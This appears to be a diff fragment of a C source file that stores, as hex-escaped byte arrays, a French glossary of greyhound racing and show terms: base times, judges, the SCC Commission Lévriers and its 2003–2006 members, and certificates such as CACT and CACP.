-"\x69\x6d\x70\x6f\x73\x65\x20\x75\x6e\x65\x20\x63\x6f\x75\x72\x74" -"\x65\x20\x6c\x69\x67\x6e\x65\x20\x64\x72\x6f\x69\x74\x65\x20\x28" -"\x34\x30\x2d\x35\x30\x6d\x29\x20\x61\x76\x65\x63\x20\x62\x69\x65" -"\x6e\x20\x64\x65\x73\x20\x61\x6c\xe9\x61\x73\x20\x61\x75\x20\x74" -"\x6f\x75\x72\x6e\x61\x6e\x74\x2e\x20\x4d\x61\x69\x73\x20\x63\x65" -"\x6c\x61\x20\x70\x6f\x75\x72\x72\x61\x69\x74\x20\x63\x68\x61\x6e" -"\x67\x65\x72\x20\x64\x61\x6e\x73\x20\x6c\x65\x73\x20\x61\x6e\x6e" 
-"\xe9\x65\x73\x20\xe0\x20\x76\x65\x6e\x69\x72\x2e\x0d\x0d\x09\x54" -"\x65\x6d\x70\x73\x20\x64\x65\x20\x62\x61\x73\x65\x20\x3a\x0d\x49" -"\x6c\x20\x65\x73\x74\x20\x63\x61\x6c\x63\x75\x6c\xe9\x20\x61\x6e" -"\x6e\x75\x65\x6c\x6c\x65\x6d\x65\x6e\x74\x20\x70\x6f\x75\x72\x20" -"\x63\x68\x61\x71\x75\x65\x20\x70\x69\x73\x74\x65\x2c\x20\x72\x61" -"\x63\x65\x2c\x20\x63\x61\x74\xe9\x67\x6f\x72\x69\x65\x2c\x20\x64" -"\x65\x20\x66\x61\xe7\x6f\x6e\x20\xe0\x20\x75\x6e\x69\x66\x6f\x72" -"\x6d\x69\x73\x65\x72\x20\x6c\x65\x73\x20\x72\xe9\x73\x75\x6c\x74" -"\x61\x74\x73\x2e\x20\x43\x68\x61\x71\x75\x65\x20\x63\x61\x74\xe9" -"\x67\x6f\x72\x69\x65\x20\x64\x65\x20\x76\x69\x74\x65\x73\x73\x65" -"\x20\x63\x6f\x72\x72\x65\x73\x70\x6f\x6e\x64\x20\xe0\x20\x31\x2c" -"\x20\x32\x2c\x20\x33\x2c\x20\x34\x20\x73\x65\x63\x6f\x6e\x64\x65" -"\x73\x20\x70\x61\x72\x20\x72\x61\x70\x70\x6f\x72\x74\x20\x61\x75" -"\x20\x74\x65\x6d\x70\x73\x20\x64\x65\x20\x62\x61\x73\x65\x2e\x20" -"\x54\x6f\x75\x73\x20\x6c\x65\x73\x20\x6c\xe9\x76\x72\x69\x65\x72" -"\x73\x20\x41\x20\x64\x6f\x69\x76\x65\x6e\x74\x20\x70\x6f\x75\x76" -"\x6f\x69\x72\x20\x66\x69\x67\x75\x72\x18\x72\x20\x68\x6f\x6e\x6f" -"\x72\x61\x62\x6c\x65\x6d\x65\x6e\x74\x20\x61\x75\x20\x6e\x69\x76" -"\x65\x61\x75\x20\x69\x6e\x74\x65\x72\x6e\x61\x74\x69\x6f\x6e\x61" -"\x6c\x20\x73\x61\x6e\x73\x20\x70\x72\xe9\x74\x65\x6e\x64\x72\x65" -"\x20\x66\x6f\x72\x63\x65\x6d\x65\x6e\x74\x20\x61\x75\x20\x70\x6f" -"\x64\x69\x75\x6d\x2e\x0d\x0d\x09\x43\x68\x65\x66\x20\x64\x65\x20" -"\x70\x69\x73\x74\x65\x20\x3a\x0d\x43\x27\x65\x73\x74\x20\x6c\x65" -"\x20\x72\x65\x73\x70\x6f\x6e\x73\x61\x62\x6c\x65\x20\x74\x65\x63" -"\x68\x6e\x69\x71\x75\x65\x20\x64\x65\x20\x6c\x61\x20\x6a\x6f\x75" -"\x72\x6e\xe9\x65\x20\x65\x74\x20\x6c\x61\x20\x73\x65\x75\x6c\x65" -"\x20\x70\x65\x72\x73\x6f\x6e\x6e\x65\x20\x68\x61\x62\x69\x6c\x69" -"\x74\xe9\x65\x20\xe0\x20\x72\x65\x63\x65\x76\x6f\x69\x72\x20\x76" -"\x6f\x73\x20\x64\x6f\x6c\xe9\x61\x6e\x63\x65\x73\x20\x6f\x75\x20" 
-"\x72\xe9\x63\x6c\x61\x6d\x61\x74\x69\x6f\x6e\x73\x2e\x20\x49\x6c" -"\x20\x6c\x65\x73\x20\xe9\x63\x61\x72\x74\x65\x20\x6f\x75\x20\x6c" -"\x65\x73\x20\x74\x72\x61\x6e\x73\x6d\x65\x74\x20\x61\x75\x20\x6a" -"\x75\x67\x65\x20\x71\x75\x35\x20\x61\x20\x73\x65\x75\x6c\x20\x70" -"\x6f\x75\x76\x6f\x69\x72\x20\x64\x65\x20\x64\xe9\x63\x69\x73\x69" -"\x6f\x6e\x2e\x0d\x0d\x09\x4a\x75\x67\x65\x20\x3a\x0d\x4c\x65\x20" -"\x6a\x75\x67\x65\x20\x65\x73\x74\x20\x75\x6e\x20\x65\x78\x70\x65" -"\x72\x74\x20\x71\x75\x69\x20\x61\x20\x70\x61\x73\x73\xe9\x20\x75" -"\x6e\x20\x65\x78\x61\x6d\x65\x6e\x20\x64\x65\x76\x61\x6e\x74\x20" -"\x6c\x61\x20\x43\x6f\x6d\x6d\x69\x73\x73\x69\x6f\x6e\x20\x4c\xe9" -"\x76\x72\x69\x65\x72\x73\x2c\x20\x70\x75\x69\x73\x20\x75\x6e\x20" -"\x61\x75\x74\x72\x65\x20\x65\x6e\x20\x45\x63\x6f\x6c\x65\x20\x56" -"\xe9\x74\xe9\x72\x69\x6e\x61\x69\x72\x65\x20\x61\x70\x72\xe8\x73" -"\x20\x75\x6e\x20\x73\x74\x61\x67\x65\x20\x64\x65\x20\x33\x20\x6a" -"\x6f\x75\x72\x73\x2c\x20\x70\x75\x69\x73\x20\x61\x20\x65\x78\x65" -"\x72\x63\xe9\x20\x61\x75\x70\x72\xe8\x73\x20\x64\x27\x75\x6e\x20" -"\x6a\x75\x67\x65\x20\x71\x75\x61\x6c\x69\x66\x69\xe9\x20\x28\x61" -"\x73\x73\x65\x73\x73\x6f\x72\x61\x74\x29\x2c\x20\x70\x75\x69\x73" -"\x20\x69\x6c\x20\x65\x73\x74\x20\x70\x72\x6f\x70\x6f\x73\xe9\x20" -"\x70\x61\x72\x20\x6c\x61\x20\x43\x6f\x6d\x6d\x69\x73\x73\x69\x6f" -"\x6e\x20\x4c\xe9\x76\x72\x69\x65\x72\x73\x20\xe0\x20\x6c\x61\x20" -"\x43\x6f\x6d\x6d\x69\x73\x73\x69\x6f\x6e\x20\x64\x65\x73\x20\x4a" -"\x75\x67\x65\x73\x20\x64\x65\x20\x6c\x61\x20\x53\x43\x43\x2e\x20" -"\x49\x6c\x20\x70\x6f\x75\x72\x72\x61\x20\x61\x6c\x6f\x72\x73\x20" -"\x6a\x75\x67\x65\x72\x20\x6c\x65\x73\x20\xe9\x70\x72\x65\x75\x76" -"\x65\x73\x20\x6f\x72\x64\x69\x6e\x61\x69\x72\x65\x73\x20\x61\x76" -"\x61\x6e\x74\x20\x64\x27\xea\x74\x72\x65\x20\x71\x75\x61\x6c\x69" -"\x66\x69\xe9\x2e\x20\x55\x6e\x20\x70\x61\x72\x63\x6f\x75\x72\x73" -"\x20\x6c\x6f\x6e\x67\x2c\x20\x63\x6f\x6d\x70\x6c\x65\x78\x65\x2c" 
-"\x20\x70\xe9\x6e\x69\x62\x6c\x65\x20\x71\x75\x69\x20\x6d\xe9\x72" -"\x69\x74\x65\x20\x76\x6f\x74\x72\x65\x20\x63\x6f\x75\x72\x74\x6f" -"\x69\x73\x69\x65\x2e\x0d\x0d\x09\x45\x78\x70\x65\x72\x74\x20\x51" -"\x75\x61\x6c\x69\x66\x69\x63\x61\x74\x65\x75\x72\x20\x3a\x0d\x34" -"\x20\x61\x75\x20\x6d\x61\x78\x69\x6d\x75\x6d\x20\x70\x61\x72\x20" -"\x43\x6c\x75\x62\x2c\x20\x70\x6c\x75\x73\x20\x6c\x65\x73\x20\x6a" -"\x75\x67\x65\x73\x20\x71\x75\x61\x6c\x69\x66\x69\xe9\x73\x2c\x20" -"\x70\x72\x6f\x70\x6f\x73\xe9\x73\x20\x70\x61\x72\x20\x6c\x65\x20" -"\x43\x6c\x75\x62\x2e\x20\x49\x6c\x20\x73\x75\x62\x69\x74\x20\x75" -"\x6e\x20\x65\x78\x61\x6d\x65\x6e\x20\x74\x68\xe9\x6f\x72\x69\x71" -"\x75\x65\x20\x65\x74\x20\x70\x72\x61\x74\x69\x71\x75\x65\x20\x64" -"\x65\x76\x61\x6e\x74\x20\x6c\x61\x20\x43\x6f\x6d\x6d\x69\x73\x73" -"\x69\x6f\x6e\x20\x4c\xe9\x76\x72\x69\x65\x72\x73\x20\x71\x75\x69" -"\x20\x6c\x65\x20\x6e\x6f\x6d\x6d\x65\x2e\x20\x4c\x65\x20\x50\x72" -"\xe9\x73\x69\x64\x65\x6e\x74\x20\x64\x75\x20\x43\x6c\x75\x62\x20" -"\x6f\x75\x20\x6c\x61\x20\x43\x6f\x6d\x6d\x69\x73\x73\x69\xc9\x6e" -"\x20\x4c\xe9\x76\x72\x69\x65\x72\x73\x20\x70\x65\x75\x76\x65\x6e" -"\x74\x20\x6c\x65\x20\x72\x65\x6c\x65\x76\x65\x72\x20\x64\x65\x20" -"\x73\x61\x20\x66\x6f\x6e\x63\x74\x69\x6f\x6e\x2c\x20\x71\x75\x69" -"\x20\x65\x73\x74\x20\x64\xe9\x6c\x69\x63\x61\x74\x65\x20\x65\x74" -"\x20\x6c\x6f\x75\x72\x64\x65\x2e\x0d\x0d\x09\x43\x6f\x6d\x6d\x69" -"\x73\x73\x69\x6f\x6e\x20\x4c\xe9\x76\x72\x69\x65\x72\x73\x20\x3a" -"\x0d\x0d\x45\x6c\x6c\x65\x20\x63\x6f\x6d\x70\x72\x65\x6e\x64\x20" -"\x75\x6e\x65\x20\x64\x69\x7a\x61\x69\x6e\x65\x20\x64\x65\x20\x70" -"\x65\x72\x73\x6f\x6e\x6e\x65\x73\x20\x6e\x6f\x6d\x6d\xe9\x65\x73" -"\x20\x70\x6f\x75\x72\x20\x74\x72\x6f\x69\x73\x20\x61\x6e\x73\x20" -"\x70\x61\x72\x20\x6c\x65\x20\x43\x6f\x6d\x69\x74\xe9\x20\x64\x65" -"\x20\x6c\x61\x20\x53\x43\x43\x20\x70\x61\x72\x6d\x69\x20\x73\x65" -"\x73\x20\x70\x72\x6f\x70\x72\x65\x73\x20\x6d\x65\x6d\x62\x72\x65" 
-"\x73\x20\x65\x74\x20\x70\x61\x72\x6d\x69\x20\x64\x65\x73\x20\x70" -"\x65\x72\x73\x6f\x6e\x6e\x61\x6c\x69\x74\xe9\x73\x20\x71\x75\x61" -"\x6c\x69\x66\x69\xe9\x65\x73\x2e\x20\x4c\x61\x20\x43\x6f\x6d\x6d" -"\x69\x73\x73\x69\x6f\x6e\x20\x4c\xe9\x76\x72\x69\x65\x72\x73\x20" -"\xe9\x6c\x69\x74\x20\xe0\x20\x73\x6f\x6e\x20\x74\x6f\x75\x72\x20" -"\x65\x6e\x20\x73\x6f\x6e\x20\x73\x65\x69\x6e\x20\x64\x69\x76\x65" -"\x72\x73\x65\x73\x20\x70\x65\x72\x73\x6f\x6e\x6e\x65\x73\x2e\x20" -"\x50\x6f\x75\x72\x20\x6c\x61\x20\x70\xe9\x72\x69\x6f\x64\x65\x20" -"\x32\x30\x30\x33\x20\x2d\x20\x32\x30\x30\x36\x2c\x20\x20\x6e\x6f" -"\x75\x73\x20\x61\x76\x6f\x6e\x73\x20\x61\x69\x6e\x73\x69\x20\x3a" -"\x0d\x0d\x20\x50\x72\xe9\x73\x69\x64\x65\x6e\x74\x20\x3a\x0d\x2d" -"\x20\x4d\x2e\x20\x48\x65\x72\x6d\x65\x6c\x2c\x20\x43\x6f\x6d\x69" -"\x74\xe9\x20\x53\x43\x43\x2c\x20\x4a\x75\x67\x65\x2e\x0d\x0d\x20" -"\x53\x65\x63\x72\xe9\x74\x61\x69\x72\x65\x20\x3a\x0d\x2d\x20\x4d" -"\x6c\x6c\x65\x20\x4d\x6f\x6e\x69\x6f\x74\x2c\x20\x4a\x75\x67\x65" -"\x20\x64\x65\x20\x54\x72\x61\x76\x61\x69\x6c\x2c\x20\x50\x72\xe9" -"\x73\x69\x64\x65\x6e\x74\x65\x20\x64\x75\x20\x43\x4c\x43\x2c\x20" -"\x43\x6f\x6d\x69\x74\xe9\x20\x43\x46\x57\x2c\x20\x43\x6f\x6d\x69" -"\x74\xe9\x20\x43\x46\x50\x4c\x49\x2e\x0d\x53\x65\x63\x72\xe9\x74" -"\x64\x69\x72\x65\x20\x61\x64\x6a\x6f\x69\x6e\x74\x3a\x0d\x2d\x20" -"\x4d\x2e\x20\x46\x61\x75\x72\x65\x2c\x20\x4a\x75\x67\x65\x0d\x0d" -"\x20\x4d\x65\x6d\x62\x72\x65\x73\x20\x3a\x0d\x2d\x20\x4d\x2e\x41" -"\x72\x74\x68\x75\x73\x2c\x20\x50\x72\xe9\x73\x69\x64\x65\x6e\x74" -"\x20\x64\x65\x20\x6c\x61\x20\x53\x43\x43\x0d\x2d\x20\x4d\x6d\x65" -"\x20\x54\x75\x6d\x61\x2c\x20\x50\x72\xe9\x73\x69\x64\x65\x6e\x74" -"\x65\x20\x64\x75\x20\x43\x46\x50\x4c\x49\x2c\x20\x50\x72\xe9\x73" -"\x69\x64\x65\x6e\x74\x65\x20\x64\x75\x20\x4e\x41\x4c\x4c\x85\x0d" -"\x2d\x20\x4d\x2e\x20\x41\x69\x6e\x61\x72\x64\x69\x2c\x20\x4a\x75" -"\x67\x65\x20\x64\x65\x20\x54\x72\x61\x76\x61\x69\x6c\x2c\x20\x4a" 
-"\x75\x67\x65\x2c\x20\x20\x0d\x09\x43\x6f\x75\x72\x73\x65\x20\x49" -"\x2e\x54\x2e\x20\x3a\x0d\x43\x6f\x75\x72\x73\x65\x20\x69\x6e\x74" -"\x65\x72\x6e\x61\x74\x69\x6f\x6e\x61\x6c\x65\x2e\x0d\x0d\x09\x4c" -"\x69\x63\x65\x6e\x63\x65\x20\x3a\x0d\x41\x6e\x63\x69\x65\x6e\x6e" -"\x65\x20\x61\x70\x70\x65\x6c\x6c\x61\x74\x69\x6f\x6e\x20\x64\x65" -"\x20\x6c\x61\x20\x6c\x69\x63\x65\x6e\x63\x65\x20\x69\x6e\x74\x65" -"\x72\x6e\x61\x74\x69\x6f\x6e\x61\x6c\x65\x2e\x0d\x43\x6f\x72\x72" -"\x65\x73\x70\x6f\x6e\x64\x20\x61\x75\x20\x6e\x6f\x8c\x76\x65\x61" -"\x75\x20\x63\x61\x72\x6e\x65\x74\x20\x31\x39\x39\x30\x2e\x0d\x0d" -"\x09\x42\x41\x43\x20\x3a\x0d\x44\x6f\x63\x75\x6d\x65\x6e\x74\x20" -"\x61\x74\x74\x65\x73\x74\x61\x6e\x74\x20\x6c\x61\x20\x63\x61\x70" -"\x61\x63\x69\x74\xe9\x20\x64\x65\x20\x63\x6f\x75\x72\x69\x72\x20" -"\x65\x6e\x20\x72\x61\x63\x69\x6e\x67\x20\x65\x74\x20\x50\x56\x4c" -"\x2e\x20\x41\x75\x74\x72\x65\x66\x6f\x69\x73\x20\x43\x41\x54\x2e" -"\x0d\x0d\x09\x42\x50\x56\x20\x3a\x0d\x44\x6f\x63\x75\x6d\x65\x6e" -"\x74\x20\x61\x74\x74\x65\x73\x74\x61\x6e\x74\x20\x6c\x61\x20\x63" -"\x61\x70\x61\x63\x69\x74\xe9\x20\x64\x65\x20\x63\x6f\x75\x72\x69" -"\x72\x20\x65\x6e\x20\x50\x56\x4c\x2e\x20\x41\x75\x74\x72\x65\x66" -"\x6f\x69\x73\x20\x43\x41\x54\x50\x2e\x0d\x0d\x09\x43\x41\x43\x54" -"\x20\x3a\x0d\x43\x65\x72\x74\x69\x66\x69\x63\x61\x74\x20\x64\x27" -"\x41\x70\x74\x69\x74\x75\x64\x65\x20\x61\x75\x20\x43\x68\x61\x6d" -"\x70\x69\x6f\x6e\x6e\x61\x74\x20\x64\x65\x20\x54\x72\x61\x76\x61" -"\x69\x6c\x2e\x0d\x44\xe9\x63\x65\x72\x6e\xe9\x20\x61\x75\x20\x76" -"\x61\x69\x6e\x71\x75\x65\x75\x72\x20\x64\x65\x20\x6c\x61\x20\x63" -"\x61\x74\xe9\x67\x6f\x72\x69\x65\x20\x41\x2e\x0d\x0d\x09\x52\x43" -"\x41\x43\x54\x20\x3a\x0d\x52\xe9\x73\x65\x72\x76\x65\x20\x64\x65" -"\x20\x43\x65\x72\x74\x69\x66\x69\x63\x61\x74\x20\x64\x27\x41\x70" -"\x74\x69\x74\x75\x64\x65\x20\x61\x75\x20\x43\x68\x61\x6d\x70\x69" -"\x6f\x6e\x6e\x61\x74\x20\x64\x65\x20\x54\x72\x61\x76\x61\x69\x6c" 
-"\x2e\x0d\x44\xe9\x63\x65\x72\x6e\xe9\x20\x61\x75\x20\x73\x65\x63" -"\x6f\x6e\x64\x20\x64\x65\x20\x6c\x61\x20\x63\x61\x74\xe9\x67\x6f" -"\x72\x69\x65\x20\x41\x2e\x20\x49\x6c\x20\x73\x65\x20\x74\x72\x61" -"\x6e\x73\x66\x6f\x72\x6d\x65\x20\x65\x6e\x20\x43\x41\x43\x54\x20" -"\x73\x69\x20\x6c\x65\x20\x76\x61\x69\x6e\x71\x75\x65\x75\x72\x20" -"\x65\x73\x74\x20\x75\x6e\x20\x63\x68\x61\x6d\x70\x69\x6f\x6e\x20" -"\x68\x6f\x6d\x6f\x6c\x6f\x67\x75\xe9\x2e\x0d\x0d\x09\x43\x41\x43" -"\x50\x20\x3a\x0d\x43\x65\x72\x74\x69\x66\x69\x63\x61\x74\x20\x64" -"\x27\x41\x70\x74\x69\x74\x75\x64\x65\x20\x61\x75\x20\x43\x68\x61" -"\x6d\x70\x69\x6f\x6e\x6e\x61\x74\x20\x64\x65\x20\x50\x6f\x75\x72" -"\x73\x75\x69\x74\x65\x2e\x0d\x44\xe9\x63\x65\x72\x6e\xe9\x20\x61" -"\x75\x20\x76\x61\x69\x6e\x71\x75\x65\x75\x72\x20\x64\x27\x75\x6e" -"\x65\x20\x45\x50\x56\x4c\x2c\x20\x61\x79\x61\x6e\x74\x20\x75\x6e" -"\x20\x6d\x69\x6e\x69\x6d\x75\x6d\x20\x64\x65\x20\x32\x35\x20\x70" -"\x6f\x69\x6e\x74\x73\x2e\x0d\x0d\x09\x52\x43\x41\x43\x50\x20\x3a" -"\x0d\x52\xe9\x73\x65\x72\x76\x65\x20\x64\x65\x20\x43\x65\x72\x74" -"\x69\x66\x69\x63\x61\x74\x20\x64\x27\x41\x70\x74\x69\x74\x75\x64" -"\x65\x20\x61\x75\x20\x43\x68\x61\x6d\x70\x69\x6f\x6e\x6e\x61\x74" -"\x20\x64\x65\x20\x50\x6f\x75\x72\x73\x75\x69\x74\x65\x2e\x0d\x44" -"\xe9\x63\x65\x72\x6e\xe9\x20\x61\x75\x20\x73\x65\x63\x6f\x6e\x64" -"\x2c\x20\x61\x79\x61\x6e\x74\x20\x75\x6e\x20\x6d\x69\x6e\x69\x6d" -"\x75\x6d\x20\x64\x65\x20\x32\x35\x20\x70\x6f\x69\x6e\x74\x73\x2e" -"\x0d\x0d\x09\x45\x78\x63\x65\x6c\x6c\x65\x6e\x74\x20\x3a\x0d\x4c" -"\xe9\x76\x72\x69\x65\x72\x20\x63\x6c\x61\x73\x73\xe9\x20\x41\x20" -"\x61\x75\x20\x63\x68\x72\x6f\x6e\x6f\x6d\xe8\x74\x72\x65\x20\x6f" -"\x75\x20\x61\x79\x61\x6e\x74\x20\x64\x65\x20\x33\x33\x20\xe0\x20" -"\x32\x33\x20\x70\x6f\x69\x6e\x74\x73\x20\x70\x6f\x75\x72\x20\x6c" -"\x61\x20\x50\x56\x4c\x2e\x0d\x0d\x09\x54\x72\xe8\x73\x20\x42\x6f" -"\x6e\x20\x3a\x0d\x4c\xe9\x76\x72\x69\x65\x72\x20\x63\x6c\x61\x73" 
-"\x73\xe9\x20\x65\x6e\x20\x42\x20\x6f\x75\x20\x61\x79\x61\x6e\x74" -"\x20\x64\x65\x20\x32\x32\x20\xe0\x20\x31\x38\x20\x70\x6f\x69\x6e" -"\x74\x73\x20\x70\x6f\x75\x72\x20\x6c\x61\x20\x50\x56\x4c\x2e\x0d" -"\x0d\x09\x42\x6f\x6e\x20\x3a\x0d\x4c\xe9\x76\x72\x69\x65\x72\x20" -"\x63\x6c\x61\x73\x73\xe9\x20\x65\x6e\x20\x43\x20\x6f\x75\x20\x61" -"\x79\x61\x6e\x74\x20\x64\x65\x20\x31\x37\x20\xe0\x20\x31\x30\x20" -"\x70\x6f\x69\x6e\x74\x73\x20\x70\x6f\x75\x72\x20\x6c\x61\x20\x50" -"\x56\x4c\x2e\x0d\x0d\x09\x41\x73\x73\x65\x7a\x20\x42\x6f\x6e\x20" -"\x3a\x0d\x4c\xe9\x76\x72\x69\x65\x72\x20\x63\x6c\x61\x73\x73\xe9" -"\x20\x65\x6e\x20\x44\x2e\x0d\x0d\x09\x49\x6e\x74\x65\x72\x6e\x61" -"\x74\x69\x6f\x6e\x61\x6c\x20\x3a\x0d\x4c\xe9\x76\x72\x69\x65\x72" -"\x20\x61\x79\x61\x6e\x74\x20\x65\x66\x66\x65\x63\x74\x75\xe9\x20" -"\x75\x6e\x20\x70\x61\x72\x63\x6f\x75\x72\x73\x20\x70\x6c\x75\x73" -"\x20\x72\x61\x70\x69\x64\x65\x20\x71\x75\x65\x20\x6c\x65\x20\x74" -"\x65\x6d\x70\x73\x20\x64\x65\x20\x62\x61\x73\x65\x20\x65\x74\x20" -"\x6d\x65\x73\x75\x72\xe9\x20\x70\x61\x72\x20\x75\x6e\x20\x70\x72" -"\x6f\x63\xe9\x64\xe9\x20\xe9\x6c\x65\x63\x74\x72\x69\x71\x75\x65" -"\x2e\x0d\x0d\x09\x43\x68\x61\x6d\x70\x69\x6f\x6e\x20\x64\x65\x20" -"\x54\x72\x61\x76\x61\x69\x6c\x20\x45\x4e\x43\x20\x3a\x0d\x53\x75" -"\x72\x20\x6c\x65\x20\x70\x65\x64\x69\x67\x72\x65\x65\x2c\x20\x69" -"\x6c\x20\x79\x20\x61\x75\x72\x61\x20\xad\x63\x72\x69\x74\x20\x3a" -"\x20\x43\x48\x54\x2e\x0d\x4c\xe9\x76\x72\x69\x65\x72\x20\x61\x79" -"\x61\x6e\x74\x20\x72\xe9\x61\x6c\x69\x73\xe9\x20\x73\x75\x72\x20" -"\x33\x20\x70\x69\x73\x74\x65\x73\x20\x64\x69\x66\x66\xe9\x72\x65" -"\x6e\x74\x65\x73\x20\x3a\x0d\x20\x09\x2d\x20\x4c\x65\x20\x43\x41" -"\x43\x54\x20\x64\x65\x20\x6c\x27\xe9\x70\x72\x65\x75\x76\x65\x20" -"\x64\x65\x20\x43\x68\x61\x6d\x70\x69\x6f\x6e\x6e\x61\x74\x2c\x0d" -"\x09\x2d\x20\x55\x6e\x20\x43\x41\x43\x54\x20\x65\x6e\x20\x53\x70" -"\xe9\x63\x69\x61\x6c\x65\x2c\x0d\x20\x09\x2d\x20\x55\x6e\x20\x61" 
-"\x75\x74\x72\x65\x20\x43\x41\x43\x54\x2c\x0d\x20\x09\x2d\x20\x55" -"\x6e\x20\x45\x78\x63\x65\x6c\x6c\x65\x6e\x74\x0d\x09\x2d\x20\x55" -"\x6e\x20\x54\x72\xe8\x73\x20\x42\x6f\x6e\x20\x65\x6e\x20\x65\x78" -"\x70\x6f\x73\x69\x74\x69\x6f\x6e\x20\x65\x6e\x20\x46\x72\x61\x6e" -"\x63\x65\x2e\x0d\x0d\x09\x43\x68\x61\x6d\x70\x69\x6f\x6e\x20\x64" -"\x65\x20\x54\x72\x61\x76\x61\x69\x6c\x20\x50\x56\x4c\x20\x3a\x0d" -"\x53\x75\x72\x20\x6c\x65\x20\x70\x65\x64\x69\x67\x72\x65\x65\x2c" -"\x20\x69\x6c\x20\x79\x20\x61\x75\x72\x61\x20\xe9\x63\x72\x69\x74" -"\x20\x3a\x20\x54\x50\x4f\x2e\x0d\x4c\xe9\x76\x72\x69\x65\x72\x20" -"\x61\x79\x61\x6e\x74\x20\x72\xe9\x61\x6c\x69\x73\xe9\x20\x61\x76" -"\x65\x63\x20\x33\x20\x6a\x75\x67\x65\x73\x20\x64\x69\x66\x66\xe9" -"\x72\x65\x6e\x74\x73\x20\x3a\x0d\x20\x09\x2d\x20\x4c\x65\x20\x43" -"\x41\x43\x50\x20\x64\x65\x20\x6c\x27\xe9\x70\x72\x65\x75\x76\x65" -"\x20\x64\x65\x20\x43\x68\x61\x6d\x70\x69\x6f\x6e\x6e\x61\x74\x2c" -"\x0d\x09\x2d\x20\x55\x6e\x20\x45\x78\x63\x65\x6c\x6c\x65\x6e\x74" -"\x20\x65\x6e\x20\x53\x70\xe9\x63\x69\x61\x6c\x65\x2c\x0d\x20\x09" -"\x2d\x20\x55\x6e\x20\x61\x75\x74\x72\x65\x20\x43\x41\x43\x50\x2c" -"\x0d\x09\x2d\x20\x55\x6e\x20\x54\x72\xe8\x73\x20\x42\x6f\x6e\x20" -"\x65\x6e\x20\x65\x78\x70\x6f\x73\x69\x74\x69\x6f\x6e\x20\x65\x6e" -"\x20\x46\x72\x61\x6e\x63\x65\x2e\x0d\x0d\x4c\x61\x20\x64\x65\x6d" -"\x61\x6e\x64\x65\x20\x64\x92\x68\x6f\x6d\x6f\x6c\x6f\x67\x61\x74" -"\x69\x6f\x6e\x20\x64\x65\x76\x72\x61\x20\xea\x74\x72\x65\x20\x72" -"\xe9\x61\x6c\x69\x73\xe9\x65\x20\x6f\x62\x6c\x69\x67\x61\x74\x6f" -"\x69\x72\x65\x6d\x65\x6e\x74\x20\x64\x61\x6e\x73\x20\x6c\x65\x73" -"\x20\x36\x20\x6d\x6f\x69\x73\x20\x71\x75\x69\x20\x73\x75\x69\x76" -"\x65\x6e\x74\x20\x6c\x92\x6f\x62\x74\x65\x6e\x74\x69\x6f\x6e\x20" -"\x64\x65\x20\x63\x65\x73\x20\x65\x78\x69\x67\x65\x6e\x63\x65\x73" -"\x20\x61\x75\x73\x73\x69\x20\x62\x69\x65\x6e\x20\x70\x6f\x75\x72" -"\x20\x6c\x61\x20\x50\x56\x4c\x20\x71\x75\x65\x20\x70\x6f\x75\x72" 
-"\x20\x6c\x92\x45\x4e\x43\x2e\x0d\x0d\x09\x43\x68\x61\x6d\x70\x69" -"\x6f\x6e\x20\x64\x65\x20\x56\x69\x74\x65\x73\x73\x65\x20\x3a\x0d" -"\x53\x75\x72\x20\x6c\x65\x20\x70\x65\x64\x69\x67\x72\x65\x65\x2c" -"\x20\x69\x6c\x20\x79\x20\x61\x20\xe9\x63\x72\x69\x74\x20\x43\x48" -"\x56\x69\x2e\x0d\x43\x65\x20\x73\x6f\x6e\x74\x20\x6c\x65\x73\x20" -"\x76\x61\x69\x6e\x71\x75\x65\x75\x72\x73\x20\x64\x65\x73\x20\x43" -"\x68\x61\x6d\x70\x69\x6f\x6e\x6e\x61\x74\x73\x20\x64\x65\x20\x74" -"\x79\x70\x65\x20\x55\x49\x43\x4c\x20\x6f\x72\x67\x61\x6e\x69\x73" -"\xe9\x73\x20\x65\x6e\x20\x46\x72\x61\x6e\x63\x65\x20\x70\x65\x6e" -"\x64\x61\x6e\x74\x20\x75\x6e\x65\x20\x64\x69\x7a\x61\x69\x6e\x65" -"\x20\x64\x92\x61\x6e\x6e\xe9\x65\x2e\x0d\x0d\x09\x4c\x61\x75\x72" -"\xe9\x61\x74\x20\x53\x74\x61\x6e\x64\x61\x72\x64\x20\x50\x65\x72" -"\x66\x6f\x72\x6d\x61\x6e\x63\x65\x73\x20\x4c\xe9\x76\x72\x69\x65" -"\x72\x73\x20\x3a\x0d\x20\x53\x75\x72\x20\x6c\x65\x20\x70\x65\x64" -"\x69\x67\x72\x65\x65\x2c\x20\x69\x6c\x20\x79\x20\x61\x20\xe9\x63" -"\x72\x69\x74\x20\x3a\x20\x43\x48\x20\x4c\x53\x50\x0d\x4c\x65\x20" -"\x6c\xe9\x76\x72\x69\x65\x72\x20\x70\x6f\x75\x72\x72\x61\x20\x70" -"\x72\xe9\x74\x65\x6e\x64\x72\x65\x20\xe0\x20\x75\x6e\x20\x73\x65" -"\x75\x6c\x20\x74\x69\x74\x72\x65\x20\x64\x65\x20\x4c\x53\x50\x20" -"\x71\x75\x69\x20\x73\x65\x72\x61\x20\x6f\x62\x74\x65\x6e\x75\x20" -"\x73\x6f\x69\x74\x20\x70\x61\x72\x20\x6c\x65\x20\x72\x61\x63\x69" -; -char file_part2[]= -"\x6e\x67\x2c\x20\x73\x6f\x69\x74\x20\x70\x61\x72\x20\x6c\x61\x20" -"\x50\x56\x4c\x2c\x20\x73\x6f\x69\x74\x20\x6d\x69\x78\x74\x65\x2e" -"\x0d\x0d\x43\x6f\x75\x72\x73\x65\x3a\x0d\x43\x65\x20\x73\x6f\x6e" -"\x74\x20\x6c\x65\x73\x20\x6c\xe9\x76\x72\x69\x65\x72\x73\x20\x61" -"\x79\x61\x6e\x74\x20\x6f\x62\x74\x65\x6e\x75\x20\xe0\x20\x6c\x61" -"\x20\x66\x6f\x69\x73\x20\x64\x65\x20\x67\x72\x61\x6e\x64\x73\x20" -"\x72\xe9\x73\x75\x6c\x74\x61\x74\x73\x20\x65\x6e\x20\x45\x78\x70" -"\x6f\x73\x69\x74\x69\x6f\x6e\x20\x28\x61\x75\x20\x6d\x6f\x69\x6e" 
